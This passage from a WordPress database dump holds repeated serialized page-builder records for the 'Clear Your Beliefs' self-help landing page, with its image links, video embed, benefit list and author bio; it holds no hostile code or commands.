Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(998, 1509, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:654:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em><br />CLEAR YOUR BELIEFS</em></strong><br /><strong>Program</strong></p>\n<p style="text-align: center;"> <big>Clear Limiting and\nNegative Beliefs\nPermanently.</big>\n<p>Eliminate Beliefs that Block\nAbundance, Love,\nRelationships, and\nManifesting What You Want</p>\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(999, 1510, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:680:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong></p>\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p><center>Eliminate Beliefs that Block\nAbundance, Love,\nRelationships, and\nManifesting What You Want</center></p>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1000, 1511, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:718:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big></p>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that Block\nAbundance, Love,\nRelationships, and\nManifesting What You Want</strong></center></p>\n\n<p style="text-align: center; margin-bottom: 70px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2724:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1001, 1512, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" 